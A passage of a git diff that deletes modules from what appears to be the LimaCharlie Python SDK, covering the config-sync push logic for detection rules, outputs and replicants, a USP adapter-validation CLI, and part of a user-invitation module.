-        if not isinstance( toConfigFile, dict ):
-            with open( toConfigFile, 'wb' ) as f:
-                f.write( yaml.safe_dump( asConf, default_flow_style = False ).encode() )
-
-    def push( self, fromConfigFile, isForce = False, isDryRun = False, isNoRules = False, isNoFPs = False, isNoOutputs = False, isNoIntegrity = False, isNoLogging = False, isNoExfil = False, isNoResources = False ):
-        '''Apply the configuratiion in a local config file to the effective configuration in the cloud.
-
-        Users should favor using the "push<Type>()" convenience functions instead of the
-        main "push()" function as they are safer to use in the event support for new
-        data-types is added to the "push()" function.
-
-        Args:
-            fromConfigFile (str/dict): the path to the config file or dict of a config file content.
-            isForce (boolean): if True will remove configurations in the cloud that are not present in the local file.
-            isDryRun (boolean): if True will only simulate the effect of a push.
-
-        Returns:
-            a generator of changes as tuple (changeType, dataType, dataName).
-        '''
-        if isinstance( fromConfigFile, dict ):
-            # The config is already in memory.
-            asConf = fromConfigFile
-        else:
-            # Load the config file from disk.
-            fromConfigFile = os.path.abspath( fromConfigFile )
-
-            # Config files are always evaluated relative to the current one.
-            contextPath = os.path.dirname( fromConfigFile )
-            currentPath = os.getcwd()
-            os.chdir( contextPath )
-
-            # This function also does the bulk of the validation.
-            asConf = self._loadEffectiveConfig( fromConfigFile )
-
-            # Revert the previous CWD.
-            os.chdir( currentPath )
-
-        if not isNoRules:
-            # Check all the namespaces we have access to.
-            availableNamespaces = []
-            if self._man.testAuth( permissions = [ 'dr.list' ] ):
-                availableNamespaces.append( 'general' )
-            if self._man.testAuth( permissions = [ 'dr.list.managed' ] ):
-                availableNamespaces.append( 'managed' )
-            if self._man.testAuth( permissions = [ 'dr.list.replicant' ] ):
-                availableNamespaces.append( 'replicant' )
-
-            # Get the current rules, we will try not to push for no reason.
-            currentRules = {}
-            for namespace in availableNamespaces:
-                currentRules.update( { k : self._coreRuleContent( v ) for k, v in self._man.rules( namespace = namespace ).items() } )
-
-            # Start by adding the rules with isReplace.
-            for ruleName, rule in asConf.get( 'rules', {} ).items():
-                rule = self._coreRuleContent( rule )
-                ruleNamespace = rule.get( 'namespace', 'general' )
-                # Check to see if it is already in the current rules and in the right format.
-                previousNamespace = None
-                if ruleName in currentRules:
-                    previousNamespace = currentRules[ ruleName ].get( 'namespace', 'general' )
-                    if ( self._isJsonEqual( rule[ 'detect' ], currentRules[ ruleName ][ 'detect' ] ) and
-                         self._isJsonEqual( rule[ 'respond' ], currentRules[ ruleName ][ 'respond' ] ) and
-                         ruleNamespace == previousNamespace ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'rule', ruleName )
-                        continue
-                if not isDryRun:
-                    if previousNamespace is not None and ruleNamespace != previousNamespace:
-                        # Looks like the rule changed namespace.
-                        self._man.del_rule( ruleName, namespace = previousNamespace )
-                    self._man.add_rule( ruleName, rule[ 'detect' ], rule[ 'respond' ], isReplace = True, namespace = ruleNamespace )
-                yield ( '+', 'rule', ruleName )
-
-            # If we are not told to isForce, this is it.
-            if isForce:
-                # Check all the namespaces we have access to.
-                currentRules = {}
-                for namespace in availableNamespaces:
-                    currentRules.update( self._man.rules( namespace = namespace ) )
-                # Now if isForce was specified, list existing rules and remove the ones
-                # not in our list.
-                for ruleName, rule in currentRules.items():
-                    # Ignore special replicant rules.
-                    if ruleName.startswith( '__' ):
-                        continue
-                    if ruleName not in asConf.get( 'rules', {} ):
-                        if not isDryRun:
-                            self._man.del_rule( ruleName, namespace = rule.get( 'namespace', 'general' ) )
-                        yield ( '-', 'rule', ruleName )
-
-        if not isNoFPs:
-            # Get the current rules, we will try not to push for no reason.
-            currentRules = { k : self._coreFPContent( v ) for k, v in self._man.fps().items() }
-
-            # Start by adding the rules with isReplace.
-            for ruleName, rule in asConf.get( 'fps', {} ).items():
-                rule = self._coreFPContent( rule )
-                # Check to see if it is already in the current rules and in the right format.
-                if ruleName in currentRules:
-                    if self._isJsonEqual( rule[ 'data' ], currentRules[ ruleName ][ 'data' ] ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'fp', ruleName )
-                        continue
-                if not isDryRun:
-                    self._man.add_fp( ruleName, rule[ 'data' ], isReplace = True )
-                yield ( '+', 'fp', ruleName )
-
-            # If we are not told to isForce, this is it.
-            if isForce:
-                currentRules = self._man.fps()
-
-                # Now if isForce was specified, list existing rules and remove the ones
-                # not in our list.
-                for ruleName, rule in currentRules.items():
-                    # Ignore special replicant rules.
-                    if ruleName not in asConf.get( 'fps', {} ):
-                        if not isDryRun:
-                            self._man.del_fp( ruleName )
-                        yield ( '-', 'fp', ruleName )
-
-        if not isNoOutputs:
-            # Get the current outputs, we will try not to push for no reason.
-            currentOutputs = { k : self._coreOutputContent( v ) for k, v in self._man.outputs().items() }
-
-            for outputName, output in asConf.get( 'outputs', {} ).items():
-                if outputName in currentOutputs:
-                    if self._isJsonEqual( output, currentOutputs[ outputName ] ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'output', outputName )
-                        continue
-                if not isDryRun:
-                    self._man.add_output( outputName, output[ 'module' ], output[ 'for' ], **{ k : v for k, v in output.items() if k not in ( 'module', 'for' ) } )
-                yield ( '+', 'output', outputName )
-
-            if isForce:
-                # Now if isForce was specified, list the existing outputs and remove the ones
-                # not in our list.
-                for outputName, output in self._man.outputs().items():
-                    if outputName not in asConf.get( 'outputs', {} ):
-                        if not isDryRun:
-                            self._man.del_output( outputName )
-                        yield ( '-', 'output', outputName )
-
-        if not isNoIntegrity:
-            integrityReplicant = Integrity( self._man )
-            currentIntegrityRules = { k : self._coreIntegrityContent( v ) for k, v in integrityReplicant.getRules().items() }
-
-            for ruleName, rule in asConf.get( 'integrity', {} ).items():
-                if ruleName in currentIntegrityRules:
-                    if self._isJsonEqual( rule, currentIntegrityRules[ ruleName ] ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'integrity', ruleName )
-                        continue
-                if not isDryRun:
-                    integrityReplicant.addRule( ruleName,
-                                                patterns = rule[ 'patterns' ],
-                                                tags = rule.get( 'tags', [] ),
-                                                platforms = rule.get( 'platforms', [] ) )
-                yield ( '+', 'integrity', ruleName )
-
-            if isForce:
-                # Now if isForce was specified, list the existing rules and remove the ones
-                # not in our list.
-                for ruleName, rule in integrityReplicant.getRules().items():
-                    if ruleName not in asConf.get( 'integrity', {} ):
-                        if not isDryRun:
-                            integrityReplicant.removeRule( ruleName )
-                        yield ( '-', 'integrity', ruleName )
-
-        if not isNoLogging:
-            loggingReplicant = Logging( self._man )
-            currentLoggingRules = { k : self._coreLoggingContent( v ) for k, v in loggingReplicant.getRules().items() }
-            for ruleName, rule in asConf.get( 'logging', {} ).items():
-                if ruleName in currentLoggingRules:
-                    if self._isJsonEqual( rule, currentLoggingRules[ ruleName ] ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'logging', ruleName )
-                        continue
-                if not isDryRun:
-                    loggingReplicant.addRule( ruleName,
-                                              patterns = rule[ 'patterns' ],
-                                              tags = rule.get( 'tags', [] ),
-                                              platforms = rule.get( 'platforms', [] ),
-                                              isDeleteAfter = rule.get( 'is_delete_after', False ),
-                                              isIgnoreCert = rule.get( 'is_ignore_cert', False ), 
-                                              daysRetention = rule.get( 'days_retention', 0 ) )
-                yield ( '+', 'logging', ruleName )
-
-            if isForce:
-                # Now if isForce was specified, list the existing rules and remove the ones
-                # not in our list.
-                for ruleName, rule in loggingReplicant.getRules().items():
-                    if ruleName not in asConf.get( 'logging', {} ):
-                        if not isDryRun:
-                            loggingReplicant.removeRule( ruleName )
-                        yield ( '-', 'logging', ruleName )
-
-        if not isNoExfil:
-            exfilReplicant = Exfil( self._man )
-            currentExfilRules = exfilReplicant.getRules()
-            for ruleName, rule in asConf.get( 'exfil', {} ).get( 'watch', {} ).items():
-                if ruleName in currentExfilRules.get( 'watch', {} ):
-                    if self._isJsonEqual( rule, self._coreExfilContent( currentExfilRules[ 'watch' ][ ruleName ] ) ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'exfil-watch', ruleName )
-                        continue
-                if not isDryRun:
-                    exfilReplicant.addWatchRule( ruleName,
-                                                 event = rule[ 'event' ],
-                                                 operator = rule[ 'operator' ],
-                                                 value = rule[ 'value' ],
-                                                 path = rule[ 'path' ],
-                                                 tags = rule.get( 'tags', [] ),
-                                                 platforms = rule.get( 'platforms', [] ) )
-                yield ( '+', 'exfil-watch', ruleName )
-
-            for ruleName, rule in asConf.get( 'exfil', {} ).get( 'list', {} ).items():
-                if ruleName in currentExfilRules.get( 'list', {} ):
-                    if self._isJsonEqual( rule, self._coreExfilContent( currentExfilRules[ 'list' ][ ruleName ] ) ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'exfil-list', ruleName )
-                        continue
-                if not isDryRun:
-                    exfilReplicant.addEventRule( ruleName,
-                                                 events = rule[ 'events' ],
-                                                 tags = rule.get( 'tags', [] ),
-                                                 platforms = rule.get( 'platforms', [] ) )
-                yield ( '+', 'exfil-list', ruleName )
-
-            if isForce:
-                # Now if isForce was specified, list the existing rules and remove the ones
-                # not in our list.
-                for ruleName, rule in exfilReplicant.getRules().get( 'watch', {} ).items():
-                    if ruleName not in asConf.get( 'exfil', {} ).get( 'watch', {} ):
-                        if not isDryRun:
-                            exfilReplicant.removeWatchRule( ruleName )
-                        yield ( '-', 'exfil-watch', ruleName )
-                for ruleName, rule in exfilReplicant.getRules().get( 'list', {} ).items():
-                    if ruleName not in asConf[ 'exfil' ].get( 'list', {} ):
-                        if not isDryRun:
-                            exfilReplicant.removeEventRule( ruleName )
-                        yield ( '-', 'exfil-list', ruleName )
-        if not isNoResources:
-            currentResources = self._man.getSubscriptions()
-            for cat in asConf.get( 'resources', {} ):
-                for resName in asConf.get( 'resources', {} )[ cat ]:
-                    fullResName = '%s/%s' % ( cat, resName )
-                    if resName not in currentResources.get( cat, [] ):
-                        if not isDryRun:
-                            self._man.subscribeToResource( fullResName )
-                        yield ( '+', 'resource', fullResName )
-                    else:
-                        yield ( '=', 'resource', fullResName )
-            # Only force "resources" if it is present in the config.
-            # This avoids unexpected disabling of all configs.
-            if isForce and 'resources' in asConf:
-                for cat in currentResources:
-                    for resName in currentResources[ cat ]:
-                        if resName not in asConf.get( 'resources', {} ).get( cat, [] ):
-                            fullResName = '%s/%s' % ( cat, resName )
-                            if not isDryRun:
-                                self._man.unsubscribeFromResource( fullResName )
-                            yield ( '-', 'resource', fullResName )
-
-    def _loadEffectiveConfig( self, configFile ):
-        configFile = os.path.abspath( configFile )
-        with open( configFile, 'rb' ) as f:
-            asConf = yaml.safe_load( f.read().decode() )
-        if 'version' not in asConf:
-            raise LcConfigException( 'Version not found.' )
-        if self._confVersion < asConf[ 'version' ]:
-            raise LcConfigException( 'Version not supported.' )
-
-        includes = asConf.get( 'include', [] )
-        if _isStringCompat( includes ):
-            includes = [ includes ]
-        for include in includes:
-            if not _isStringCompat( include ):
-                raise LcConfigException( 'Include should be a string, not %s' % ( str( type( include ) ), ) )
-            # Config files are always evaluated relative to the current one.
-            contextPath = os.path.dirname( configFile )
-            currentPath = os.getcwd()
-            os.chdir( contextPath )
-
-            subConf = self._loadEffectiveConfig( include )
-
-            # Revert the previous CWD.
-            os.chdir( currentPath )
-
-            for cat in ( 'rules', 'outputs' ):
-                subCat = subConf.get( cat, None )
-                if subCat is not None:
-                    asConf.setdefault( cat, {} ).update( subCat )
-
-        return asConf
-
-    def pushRules( self, fromConfigFile, isForce = False, isDryRun = False ):
-        '''Convenience function to push the D&R rules in a local config file to the effective configuration in the cloud.
-
-        Args:
-            fromConfigFile (str/dict): the path to the config file or dict of a config file content.
-            isForce (boolean): if True will remove configurations in the cloud that are not present in the local file.
-            isDryRun (boolean): if True will only simulate the effect of a push.
-
-        Returns:
-            a generator of changes as tuple (changeType, dataType, dataName).
-        '''
-        return list( self.push( fromConfigFile, isForce = isForce, isDryRun = isDryRun, isNoRules = False, isNoFPs = True, isNoOutputs = True, isNoIntegrity = True, isNoLogging = True, isNoExfil = True, isNoResources = True ) )
-
-    def pushFPs( self, fromConfigFile, isForce = False, isDryRun = False ):
-        '''Convenience function to push the FP rules in a local config file to the effective configuration in the cloud.
-
-        Args:
-            fromConfigFile (str/dict): the path to the config file or dict of a config file content.
-            isForce (boolean): if True will remove configurations in the cloud that are not present in the local file.
-            isDryRun (boolean): if True will only simulate the effect of a push.
-
-        Returns:
-            a generator of changes as tuple (changeType, dataType, dataName).
-        '''
-        return list( self.push( fromConfigFile, isForce = isForce, isDryRun = isDryRun, isNoRules = True, isNoFPs = False, isNoOutputs = True, isNoIntegrity = True, isNoLogging = True, isNoExfil = True, isNoResources = True ) )
-
-    def pushOutputs( self, fromConfigFile, isForce = False, isDryRun = False ):
-        '''Convenience function to push the outputs in a local config file to the effective configuration in the cloud.
-
-        Args:
-            fromConfigFile (str/dict): the path to the config file or dict of a config file content.
-            isForce (boolean): if True will remove configurations in the cloud that are not present in the local file.
-            isDryRun (boolean): if True will only simulate the effect of a push.
-
-        Returns:
-            a generator of changes as tuple (changeType, dataType, dataName).
-        '''
-        return list( self.push( fromConfigFile, isForce = isForce, isDryRun = isDryRun, isNoRules = True, isNoFPs = True, isNoOutputs = False, isNoIntegrity = True, isNoLogging = True, isNoExfil = True, isNoResources = True ) )
-
-    def pushIntegrity( self, fromConfigFile, isForce = False, isDryRun = False ):
-        '''Convenience function to push the Integrity configs in a local config file to the effective configuration in the cloud.
-
-        Args:
-            fromConfigFile (str/dict): the path to the config file or dict of a config file content.
-            isForce (boolean): if True will remove configurations in the cloud that are not present in the local file.
-            isDryRun (boolean): if True will only simulate the effect of a push.
-
-        Returns:
-            a generator of changes as tuple (changeType, dataType, dataName).
-        '''
-        return list( self.push( fromConfigFile, isForce = isForce, isDryRun = isDryRun, isNoRules = True, isNoFPs = True, isNoOutputs = True, isNoIntegrity = False, isNoLogging = True, isNoExfil = True, isNoResources = True ) )
-
-    def pushLogging( self, fromConfigFile, isForce = False, isDryRun = False ):
-        '''Convenience function to push the Logging configs in a local config file to the effective configuration in the cloud.
-
-        Args:
-            fromConfigFile (str/dict): the path to the config file or dict of a config file content.
-            isForce (boolean): if True will remove configurations in the cloud that are not present in the local file.
-            isDryRun (boolean): if True will only simulate the effect of a push.
-
-        Returns:
-            a generator of changes as tuple (changeType, dataType, dataName).
-        '''
-        return list( self.push( fromConfigFile, isForce = isForce, isDryRun = isDryRun, isNoRules = True, isNoFPs = True, isNoOutputs = True, isNoIntegrity = True, isNoLogging = False, isNoExfil = True, isNoResources = True ) )
-
-    def pushExfil( self, fromConfigFile, isForce = False, isDryRun = False ):
-        '''Convenience function to push the Exfil configs in a local config file to the effective configuration in the cloud.
-
-        Args:
-            fromConfigFile (str/dict): the path to the config file or dict of a config file content.
-            isForce (boolean): if True will remove configurations in the cloud that are not present in the local file.
-            isDryRun (boolean): if True will only simulate the effect of a push.
-
-        Returns:
-            a generator of changes as tuple (changeType, dataType, dataName).
-        '''
-        return list( self.push( fromConfigFile, isForce = isForce, isDryRun = isDryRun, isNoRules = True, isNoFPs = True, isNoOutputs = True, isNoIntegrity = True, isNoLogging = True, isNoExfil = False, isNoResources = True ) )
-
-    def pushResources( self, fromConfigFile, isForce = False, isDryRun = False ):
-        '''Convenience function to push the Resources configs in a local config file to the effective configuration in the cloud.
-
-        Args:
-            fromConfigFile (str/dict): the path to the config file or dict of a config file content.
-            isForce (boolean): if True will remove configurations in the cloud that are not present in the local file.
-            isDryRun (boolean): if True will only simulate the effect of a push.
-
-        Returns:
-            a generator of changes as tuple (changeType, dataType, dataName).
-        '''
-        return list( self.push( fromConfigFile, isForce = isForce, isDryRun = isDryRun, isNoRules = True, isNoFPs = True, isNoOutputs = True, isNoIntegrity = True, isNoLogging = True, isNoExfil = True, isNoResources = False ) )
-
-def main( sourceArgs = None ):
-    import argparse
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie sync' )
-    parser.add_argument( 'action',
-                         type = lambda x: str( x ).lower().strip(),
-                         help = 'the action to perform, one of "fetch" or "push".' )
-    parser.add_argument( '-o', '--oid',
-                         type = lambda x: str( uuid.UUID( x.strip() ) ),
-                         required = False,
-                         dest = 'oid',
-                         default = None,
-                         help = 'the OID to authenticate as, if not specified global creds will be used.' )
-    parser.add_argument( '-e', '--environment',
-                         type = str,
-                         required = False,
-                         dest = 'environment',
-                         default = None,
-                         help = 'the name of the LimaCharlie environment (as defined in ~/.limacharlie) to use, otherwise global creds will be used.' )
-    parser.add_argument( '-f', '--force',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isForce',
-                         help = 'if specified, in a push will remove all rules not in the config file' )
-    parser.add_argument( '--dry-run',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isDryRun',
-                         help = 'if specified, in a push simulates the push without making any changes.' )
-    parser.add_argument( '--no-rules',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isNoRules',
-                         help = 'if specified, ignore D&R rules from operations' )
-    parser.add_argument( '--no-fp',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isNoFPs',
-                         help = 'if specified, ignore False Psitive rules from operations' )
-    parser.add_argument( '--no-outputs',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isNoOutputs',
-                         help = 'if specified, ignore Outputs from operations' )
-    parser.add_argument( '--no-integrity',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isNoIntegrity',
-                         help = 'if specified, ignore Integrity Replicants from operations' )
-    parser.add_argument( '--no-logging',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isNoLogging',
-                         help = 'if specified, ignore Logging Replicants from operations' )
-    parser.add_argument( '--no-exfil',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isNoExfil',
-                         help = 'if specified, ignore Exfil Replicants from operations' )
-    parser.add_argument( '--no-resources',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isNoResources',
-                         help = 'if specified, ignore resource subscriptions from operations' )
-    parser.add_argument( '-c', '--config',
-                         type = str,
-                         default = 'LCConf',
-                         required = False,
-                         dest = 'config',
-                         help = 'path to the LCConf file to use' )
-    args = parser.parse_args( sourceArgs )
-
-    if args.isDryRun:
-        print( '!!! DRY RUN !!!' )
-    if args.isNoRules:
-        print( '!!! NO RULES !!!' )
-    if args.isNoOutputs:
-        print( '!!! NO OUTPUTS !!!' )
-    if args.isNoIntegrity:
-        print( '!!! NO INTEGRITY REPLICANT !!!' )
-    if args.isNoLogging:
-        print( '!!! NO LOGGING REPLICANT !!!' )
-    if args.isNoExfil:
-        print( '!!! NO EXFIL REPLICANT !!!' )
-
-    if args.action not in ( 'fetch', 'push' ):
-        print( "Action %s is not supported." % args.action )
-        sys.exit( 1 )
-
-    s = Sync( oid = args.oid, env = args.environment )
-
-    if 'fetch' == args.action:
-        s.fetch( args.config, isNoRules = args.isNoRules, isNoFPs = args.isNoFPs, isNoOutputs = args.isNoOutputs, isNoIntegrity = args.isNoIntegrity, isNoLogging = args.isNoLogging, isNoExfil = args.isNoExfil, isNoResources = args.isNoResources )
-    elif 'push' == args.action:
-        for modification, category, element in s.push( args.config, isForce = args.isForce, isDryRun = args.isDryRun, isNoRules = args.isNoRules, isNoFPs = args.isNoFPs, isNoOutputs = args.isNoOutputs, isNoIntegrity = args.isNoIntegrity, isNoLogging = args.isNoLogging, isNoExfil = args.isNoExfil, isNoResources = args.isNoResources ):
-            print( '%s %s %s' % ( modification, category, element ) )
-
-if __name__ == '__main__':
-    main()
\ No newline at end of file
diff --git a/limacharlie/USP.py b/limacharlie/USP.py
deleted file mode 100644
index 81ff4330..00000000
--- a/limacharlie/USP.py
+++ /dev/null
@@ -1,352 +0,0 @@
-# Copyright 2024 Refraction Point, Inc.
-# Licensed under the Apache License, Version 2.0
-
-"""
-USP (Universal Sensor Protocol) CLI module for LimaCharlie.
-
-Provides commands for validating USP adapter configurations before deployment.
-"""
-
-from limacharlie import Manager
-import yaml
-import json
-import sys
-
-
-def printData(data):
-    """
-    Print data in a human-readable format.
-
-    Parameters:
-        data: The data to print (str, dict, or list).
-
-    Return:
-        None
-    """
-    if isinstance(data, str):
-        print(data)
-    else:
-        print(yaml.safe_dump(data, default_flow_style=False))
-
-
-def reportError(msg):
-    """
-    Report an error message to stderr and exit with code 1.
-
-    Parameters:
-        msg (str): The error message to display.
-
-    Return:
-        None (exits the program)
-    """
-    sys.stderr.write(msg + '\n')
-    sys.exit(1)
-
-
-def _load_file_content(file_path, as_json=False):
-    """
-    Load content from a file.
-
-    Parameters:
-        file_path (str): Path to the file to load.
-        as_json (bool): If True, parse as JSON. If False, return raw text.
-
-    Return:
-        The file content (parsed JSON or raw string).
-    """
-    try:
-        with open(file_path, 'rb') as f:
-            content = f.read().decode('utf-8')
-            if as_json:
-                return json.loads(content)
-            return content
-    except FileNotFoundError:
-        reportError(f'File not found: {file_path}')
-    except json.JSONDecodeError as e:
-        reportError(f'Invalid JSON in file {file_path}: {e}')
-    except Exception as e:
-        reportError(f'Error reading file {file_path}: {e}')
-
-
-def _load_mapping(args):
-    """
-    Load mapping configuration from file or inline argument.
-
-    Parameters:
-        args: Parsed arguments containing mapping or mapping_file.
-
-    Return:
-        dict: The mapping configuration, or None if not provided.
-    """
-    if args.mapping_file:
-        try:
-            with open(args.mapping_file, 'rb') as f:
-                content = f.read()
-                # Try YAML first (also handles JSON)
-                return yaml.safe_load(content)
-        except Exception as e:
-            reportError(f'Error loading mapping file: {e}')
-    elif args.mapping:
-        try:
-            return json.loads(args.mapping)
-        except json.JSONDecodeError as e:
-            reportError(f'Invalid JSON in mapping argument: {e}')
-    return None
-
-
-def do_validate(args):
-    """
-    Validate a USP adapter configuration against sample data.
-
-    Tests parsing rules by sending sample data through the parsing engine
-    and returning the parsed events or error messages. This allows verification
-    of parsing configurations before deploying adapters to production.
-
-    Parameters:
-        args: Parsed arguments containing platform, mapping, and input data.
-
-    Return:
-        None (prints validation results to stdout)
-    """
-    # Platforms with built-in parsers that don't require custom mapping
-    builtin_parser_platforms = ['cef', 'wel', 'gcp', 'aws', '1password', 'duo', 'slack']
-
-    # Load mapping configuration
-    mapping = _load_mapping(args)
-    if mapping is None and args.mappings_file is None:
-        # Only require mapping for platforms that need custom parsing rules
-        if args.platform not in builtin_parser_platforms:
-            reportError(f'Platform "{args.platform}" requires a mapping configuration.\n'
-                       f'Use --mapping, --mapping-file, or --mappings-file to provide one.\n'
-                       f'Platforms with built-in parsers (no mapping required): {", ".join(builtin_parser_platforms)}')
-
-    # Load mappings array if provided
-    mappings = None
-    if args.mappings_file:
-        mappings = _load_file_content(args.mappings_file, as_json=True)
-        if not isinstance(mappings, list):
-            reportError('--mappings-file must contain a JSON array of mapping descriptors')
-
-    # Load input data
-    text_input = None
-    json_input = None
-
-    if args.input_file:
-        if args.json_input:
-            json_input = _load_file_content(args.input_file, as_json=True)
-            if not isinstance(json_input, list):
-                reportError('JSON input must be an array of objects')
-        else:
-            text_input = _load_file_content(args.input_file, as_json=False)
-    elif args.input:
-        if args.json_input:
-            try:
-                json_input = json.loads(args.input)
-                if not isinstance(json_input, list):
-                    reportError('JSON input must be an array of objects')
-            except json.JSONDecodeError as e:
-                reportError(f'Invalid JSON in input argument: {e}')
-        else:
-            text_input = args.input
-
-    if text_input is None and json_input is None:
-        reportError('Either --input or --input-file is required')
-
-    # Load indexing rules if provided
-    indexing = None
-    if args.indexing_file:
-        indexing = _load_file_content(args.indexing_file, as_json=True)
-        if not isinstance(indexing, list):
-            reportError('--indexing-file must contain a JSON array of indexing rules')
-
-    # Call the validation API
-    man = Manager(None, None)
-    try:
-        result = man.validateUSP(
-            platform=args.platform,
-            hostname=args.hostname,
-            mapping=mapping,
-            mappings=mappings,
-            indexing=indexing,
-            text_input=text_input,
-            json_input=json_input,
-        )
-    except Exception as e:
-        reportError(f'API error: {e}')
-
-    # Format and display results
-    errors = result.get('errors', [])
-    results = result.get('results', [])
-
-    if errors:
-        print('VALIDATION FAILED\n')
-        print('Errors:')
-        for err in errors:
-            print(f'  - {err}')
-        print('')
-        if results:
-            print(f'Partially parsed {len(results)} event(s) before failure.')
-        sys.exit(1)
-    elif len(results) == 0:
-        # No events parsed - this likely indicates misconfigured parsing rules
-        print('VALIDATION FAILED\n')
-        print('WARNING: No events were parsed from the sample data.\n')
-        print('This usually indicates one of the following issues:')
-        print('  - The parsing_re regex does not match the input format')
-        print('  - The platform type does not match the data format')
-        print('  - The sample data is empty or contains only whitespace')
-        print('')
-        print('Suggestions:')
-        print('  - Verify your parsing_re regex matches the sample data')
-        print('  - Check that the platform matches your data format (text, json, cef, etc.)')
-        print('  - Ensure the sample file contains valid log data')
-        sys.exit(1)
-    else:
-        print('VALIDATION SUCCESSFUL\n')
-        print(f'Parsed {len(results)} event(s):\n')
-
-        if args.output_format == 'json':
-            print(json.dumps(results, indent=2))
-        elif args.output_format == 'yaml':
-            print(yaml.safe_dump(results, default_flow_style=False))
-        else:
-            # Default: summary format
-            for i, event in enumerate(results, 1):
-                print(f'Event {i}:')
-                # Show routing info if present
-                routing = event.get('routing', {})
-                if routing:
-                    hostname = routing.get('hostname', routing.get('this', {}).get('hostname', ''))
-                    if hostname:
-                        print(f'  hostname: {hostname}')
-                # Show event data
-                evt = event.get('event', event)
-                for key, value in evt.items():
-                    if key != 'routing':
-                        print(f'  {key}: {value}')
-                print('')
-
-
-def main(sourceArgs=None):
-    """
-    Main entry point for the USP CLI.
-
-    Parameters:
-        sourceArgs (list): Optional list of CLI arguments. If None, uses sys.argv.
-
-    Return:
-        None
-    """
-    import argparse
-
-    actions = {
-        'validate': do_validate,
-    }
-
-    parser = argparse.ArgumentParser(
-        prog='limacharlie usp',
-        description='USP (Universal Sensor Protocol) adapter management and validation.'
-    )
-    parser.add_argument(
-        'action',
-        type=str,
-        help='the action to take, one of: %s' % (', '.join(actions.keys()))
-    )
-
-    # Platform selection
-    parser.add_argument(
-        '-p', '--platform',
-        type=str,
-        required=False,
-        default='text',
-        dest='platform',
-        choices=['text', 'json', 'cef', 'gcp', 'aws'],
-        help='parser platform type (default: text)'
-    )
-
-    # Mapping configuration (mutually exclusive options)
-    parser.add_argument(
-        '-m', '--mapping',
-        type=str,
-        required=False,
-        default=None,
-        dest='mapping',
-        help='inline JSON mapping configuration'
-    )
-    parser.add_argument(
-        '-f', '--mapping-file',
-        type=str,
-        required=False,
-        default=None,
-        dest='mapping_file',
-        help='path to YAML/JSON file containing mapping configuration'
-    )
-    parser.add_argument(
-        '--mappings-file',
-        type=str,
-        required=False,
-        default=None,
-        dest='mappings_file',
-        help='path to JSON file containing array of mapping descriptors (for multi-mapping selection)'
-    )
-
-    # Input data
-    parser.add_argument(
-        '-i', '--input',
-        type=str,
-        required=False,
-        default=None,
-        dest='input',
-        help='inline sample data to validate (text or JSON depending on --json-input)'
-    )
-    parser.add_argument(
-        '--input-file',
-        type=str,
-        required=False,
-        default=None,
-        dest='input_file',
-        help='path to file containing sample data to validate'
-    )
-    parser.add_argument(
-        '--json-input',
-        action='store_true',
-        default=False,
-        dest='json_input',
-        help='treat input as JSON array instead of newline-separated text'
-    )
-
-    # Optional parameters
-    parser.add_argument(
-        '--hostname',
-        type=str,
-        required=False,
-        default=None,
-        dest='hostname',
-        help='default hostname for sensors (defaults to "validation-test")'
-    )
-    parser.add_argument(
-        '--indexing-file',
-        type=str,
-        required=False,
-        default=None,
-        dest='indexing_file',
-        help='path to JSON file containing indexing rules'
-    )
-
-    # Output format
-    parser.add_argument(
-        '-o', '--output-format',
-        type=str,
-        required=False,
-        default='summary',
-        dest='output_format',
-        choices=['summary', 'json', 'yaml'],
-        help='output format for parsed events (default: summary)'
-    )
-
-    args = parser.parse_args(sourceArgs)
-    actions[args.action.lower()](args)
-
-
-if '__main__' == __name__:
-    main()
diff --git a/limacharlie/User.py b/limacharlie/User.py
deleted file mode 100644
index cb875840..00000000
--- a/limacharlie/User.py
+++ /dev/null
@@ -1,118 +0,0 @@
-import os
-import sys
-
-from . import Manager
-from .utils import LcApiException
-
-
-class User(object):
-    def __init__(self, manager):
-        self._manager = manager
-
-    def invite(self, email):
-        """
-        Invite user with the provided email address to LimaCharlie.
-
-        NOTE: This API operates in user context which means it needs to be called with user scoped API key.
-
-        Args:
-            email (str): Email of the user to invite.
-        """
-        print("Inviting user with email %s." % (email))
-
-        try:
-            data = self._manager.inviteUser(email=email)
-        except LcApiException as e:
-            if e.code == 401:
-                print("API returned 401. Make sure you are using a valid and user scoped API key.")
-                print("For information on how to obtain / generate user scoped API key, see https://docs.limacharlie.io/apidocs/introduction#getting-a-jwt")
-                print("Original error: %s" % (str(e)))
-                sys.exit( 1 )
-            else:
-                raise e
-
-        exists = data.get("exists", False)
-        if exists:
-            print("User with email %s already exists / has already been invited." % (email))
-        else:
-            print("User with email %s has been invited." % (email))
-
-    def inviteMulti(self, emails):
-        """
-        Invite multiple users with the provided email addresses to LimaCharlie.
-
-        Args:
-            emails (list of str): List of emails of the users to invite.
-        """
-        for email in emails:
-            self.invite(email=email)
-
-
-def parseEmailsFromCsvString(emails):
-    """
-    Parse a comma separated string of emails into a list of emails.
-
-    Args:
-        emails (str): Comma separated string of emails (e.g. test1@example.com,test2@example.com).
-    """
-    emails = [email.strip() for email in emails.split(",")]
-    return emails
-
-
-def parseEmailsFromFile(file_path):
-    """
-    Parse a file containing emails into a list of emails.
-
-    Args:
-        file_path (str): Path to the file containing emails.
-    """
-    with open(file_path, "r") as f:
-        # Support both \n and \r\n line endings
-        emails = f.readlines()
-        emails = [email.strip() for email in emails]
-        emails = [email for email in emails if email]
-
-    print("Found %d emails in the file." % (len(emails)))
-    return emails
-
-
-def main( sourceArgs = None ):
-    import argparse
-
